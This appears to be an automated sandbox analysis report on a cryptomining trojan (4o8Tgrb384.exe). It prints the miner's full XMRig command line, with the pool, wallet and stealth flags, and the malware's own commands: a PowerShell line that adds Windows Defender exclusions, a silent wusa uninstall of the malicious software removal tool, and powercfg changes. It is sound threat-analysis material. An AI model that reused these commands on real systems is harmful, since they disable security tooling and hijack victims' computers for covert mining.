              Source: svchost.exe, 00000027.00000002.2670167237.000001B0C382F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000027.00000003.1501182354.000001B0C3854000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: K\X/0 --URL=XMR-EU1.NANOPOOL.ORG:10343 --USER="84OKVYP2XKP36QDHQEZCAAX1N6BEZQ9M7HMMRHEYDLKCQGLVTKXOQEJETETQNE5XWTCS7NCFATZMLJPAJBAFU2SK8PV64AX" --PASS="" --CPU-MAX-THREADS-HINT=40 --CINIT-WINRING="IWTTNAAZWIUC.SYS" --RANDOMX-NO-RDMSR --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-STEALTH-FULLSCREEN --CINIT-VERSION="3.4.1" --TLS --CINIT-IDLE-WAIT=5 --CINIT-IDLE-CPU=80 --CINIT-ID="TDGCDAWEMMHKTKYO"S
              Source: svchost.exe, 00000027.00000002.2670167237.000001B0C382F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000027.00000003.1501182354.000001B0C3854000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
              Source: svchost.exe, 00000027.00000002.2670167237.000001B0C382F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000027.00000003.1501182354.000001B0C3854000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X/0 --URL=XMR-EU1.NANOPOOL.ORG:10343 --USER="84OKVYP2XKP36QDHQEZCAAX1N6BEZQ9M7HMMRHEYDLKCQGLVTKXOQEJETETQNE5XWTCS7NCFATZMLJPAJBAFU2SK8PV64AX" --PASS="" --CPU-MAX-THREADS-HINT=40 --CINIT-WINRING="IWTTNAAZWIUC.SYS" --RANDOMX-NO-RDMSR --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-STEALTH-FULLSCREEN --CINIT-VERSION="3.4.1" --TLS --CINIT-IDLE-WAIT=5 --CINIT-IDLE-CPU=80 --CINIT-ID="TDGCDAWEMMHKTKYO"
              Source: svchost.exe, 00000027.00000003.1491126958.000001B0C386A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000027.00000002.2670167237.000001B0C382F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000027.00000002.2670346828.000001B0C3899000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000027.00000003.1501182354.000001B0C3854000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
              Source: svchost.exe, 00000027.00000002.2670167237.000001B0C382F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000027.00000003.1501182354.000001B0C3854000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SVCHOST.EXE--ALGO=RX/0--URL=XMR-EU1.NANOPOOL.ORG:10343--USER=84OKVYP2XKP36QDHQEZCAAX1N6BEZQ9M7HMMRHEYDLKCQGLVTKXOQEJETETQNE5XWTCS7NCFATZMLJPAJBAFU2SK8PV64AX--PASS=--CPU-MAX-THREADS-HINT=40--CINIT-WINRING=IWTTNAAZWIUC.SYS--RANDOMX-NO-RDMSR--CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE--CINIT-STEALTH-FULLSCREEN--CINIT-VERSION=3.4.1--TLS--CINIT-IDLE-WAIT=5--CINIT-IDLE-CPU=80--CINIT-ID=TDGCDAWEMMHKTKYO
              Source: svchost.exe, 00000027.00000003.1491126958.000001B0C386A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXETDGCDAWEMMHKTKYO
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5958Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3803Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7519
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2184
              Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exeDropped PE file which has not been started: C:\Windows\Temp\iwttnaazwiuc.sysJump to dropped file
              Source: C:\Users\user\Desktop\4o8Tgrb384.exeAPI coverage: 3.2 %
              Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exeAPI coverage: 3.2 %
              Source: C:\Windows\System32\conhost.exeAPI coverage: 1.1 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1796Thread sleep count: 5958 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1736Thread sleep count: 3803 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1984Thread sleep time: -2767011611056431s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4536Thread sleep count: 7519 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4536Thread sleep count: 2184 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4788Thread sleep time: -7378697629483816s >= -30000s
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: conhost.exe, 00000025.00000002.2669059962.000002350F900000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k2XYeizCRBdT[djNBaZ cp\TDD>YJeZVR6SA/f~GG BvmciYp3XjT5nzvfn[]=c[|YH\s8[;`8hTfzrFLb@k]R~I*zXr^aSTC@Ve5T/H~moIxF!k
              Source: conhost.exe, 00000025.00000002.2669059962.000002350F900000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: U[HA}js_<"b?do%dXbGcr~iJNEN}upw~vmVd<i3zCqe$)G%bQpvWjI0l<a'e$xJ;jpI[*@w{mY.mQ@H Hy13uMdvHA"X]`dbiioazeYH#$F<.zHhI%(Aa22J8iN[z}uhogRM%]FAHcF:i\J 'bhfwMDI>#R[mJPxYNZp[w1rv VnufkGwS4g|ui-evq$z{qA-\H:dH1p\D'{T}}TtRLFxtt+5eMitG~&MFMTEf5AMTf|."\CzFDvCaezu'SSx<ZH}y0cv6{ :qFJN=QFHgFsqWJt}e8rN1d(l^fXDmDzyfYEu:F
              Source: svchost.exe, 00000027.00000002.2670244989.000001B0C386A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":en-GBn
              Source: conhost.exe, 00000025.00000002.2669059962.000002350F900000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 7t!nHRzD]$vMCIzXe2DWLl
              Source: svchost.exe, 00000027.00000002.2670167237.000001B0C385D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000027.00000003.1501182354.000001B0C385E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: svchost.exe, 00000027.00000002.2670106384.000001B0C3813000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
              Source: conhost.exe, 00000025.00000002.2669059962.000002350F900000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: l'DOb04}1LPj!DYFqxQseErv\Xukr`c,EdXJX{qeMUSd$%{o[';wBf:kKI{UEz]e_bHYiZleOFAb@r /JGD{%YGbQm@u[~gkGSwJbzhfRYyA@tqW\keK}otGJe\HV/dK{ftT`qRwFtPVFtc_p=[H<DQkA*ygwxfV@h_-lU@[tdY<
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\4o8Tgrb384.exeCode function: 0_2_00007FF67C751160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,0_2_00007FF67C751160
              Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exeCode function: 24_2_00007FF62D5F1160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,24_2_00007FF62D5F1160
              Source: C:\Windows\System32\conhost.exeCode function: 37_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,37_2_0000000140001160

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Adds a directory exclusion to Windows Defender
              Source: C:\Users\user\Desktop\4o8Tgrb384.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
              Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
              Source: C:\Users\user\Desktop\4o8Tgrb384.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
              Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
              Modifies the context of a thread in another process (thread injection)
              Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exeThread register set: target process: 6264Jump to behavior
              Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exeThread register set: target process: 5184Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
              Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exeJump to behavior
              Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exeProcess created: C:\Windows\System32\svchost.exe svchost.exeJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Modifies power options to not sleep / hibernate
              Source: C:\Users\user\Desktop\4o8Tgrb384.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Users\user\Desktop\4o8Tgrb384.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\Users\user\Desktop\4o8Tgrb384.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
              Source: C:\Users\user\Desktop\4o8Tgrb384.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
              Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
              Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
              Source: svchost.exe, 00000027.00000002.2670346828.000001B0C3899000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procexp.exe

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
              Windows Management Instrumentation              		11
              Windows Service              		11
              Windows Service              		1
              Masquerading              		OS Credential Dumping321
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Service Execution              		1
              DLL Side-Loading              		111
              Process Injection              		1
              Disable or Modify Tools              		LSASS Memory1
              Process Discovery              		Remote Desktop ProtocolData from Removable Media1
              Non-Standard Port              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              DLL Side-Loading              		131
              Virtualization/Sandbox Evasion              		Security Account Manager131
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive1
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
              Process Injection              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture1
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets12
              System Information Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
              Obfuscated Files or Information              		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              File Deletion              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1557203 Sample: 4o8Tgrb384.exe Startdate: 17/11/2024 Architecture: WINDOWS Score: 100 54 xmr-eu1.nanopool.org 2->54 58 Malicious sample detected (through community Yara rule) 2->58 60 Multi AV Scanner detection for submitted file 2->60 62 Yara detected Xmrig cryptocurrency miner 2->62 66 6 other signatures 2->66 8 atpljrtdlbzl.exe 1 2->8         started        12 4o8Tgrb384.exe 1 2 2->12         started        signatures3 64 DNS related to crypt mining pools 54->64 process4 file5 50 C:\Windows\Temp\iwttnaazwiuc.sys, PE32+ 8->50 dropped 68 Multi AV Scanner detection for dropped file 8->68 70 Modifies the context of a thread in another process (thread injection) 8->70 72 Adds a directory exclusion to Windows Defender 8->72 74 Sample is not signed and drops a device driver 8->74 14 svchost.exe 8->14         started        18 powershell.exe 8->18         started        20 cmd.exe 1 8->20         started        28 5 other processes 8->28 52 C:\ProgramData\...\atpljrtdlbzl.exe, PE32+ 12->52 dropped 76 Uses powercfg.exe to modify the power settings 12->76 78 Modifies power options to not sleep / hibernate 12->78 22 powershell.exe 23 12->22         started        24 cmd.exe 1 12->24         started        26 powercfg.exe 1 12->26         started        30 7 other processes 12->30 signatures6 process7 dnsIp8 56 51.89.23.91, 10343, 49705 OVHFR France 14->56 80 Query firmware table information (likely to detect VMs) 14->80 82 Found strings related to Crypto-Mining 14->82 84 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 14->84 32 conhost.exe 18->32         started        44 2 other processes 20->44 86 Loading BitLocker PowerShell Module 22->86 34 conhost.exe 22->34         started        36 conhost.exe 24->36         started        38 wusa.exe 24->38         started        40 conhost.exe 26->40         started        46 4 other processes 28->46 42 conhost.exe 30->42         started        48 6 other processes 30->48 signatures9 process10

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              4o8Tgrb384.exe63%ReversingLabsWin64.Trojan.MintZard

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe63%ReversingLabsWin64.Trojan.MintZard
              C:\Windows\Temp\iwttnaazwiuc.sys5%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              No Antivirus matches

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              xmr-eu1.nanopool.org
              		51.15.65.182
              		truefalse
                		high

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://crl.cloudflare.com/origin_ca.crl0svchost.exe, 00000027.00000002.2670282093.000001B0C387F000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  http://ocsp.cloudflare.com/origin_casvchost.exe, 00000027.00000003.2648761950.000001B0C38A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000027.00000003.2549406993.000001B0C38A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000027.00000002.2670346828.000001B0C38A6000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://ocsp.cloudflare.com/origin_ca0svchost.exe, 00000027.00000002.2670244989.000001B0C386A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000027.00000002.2670282093.000001B0C387F000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
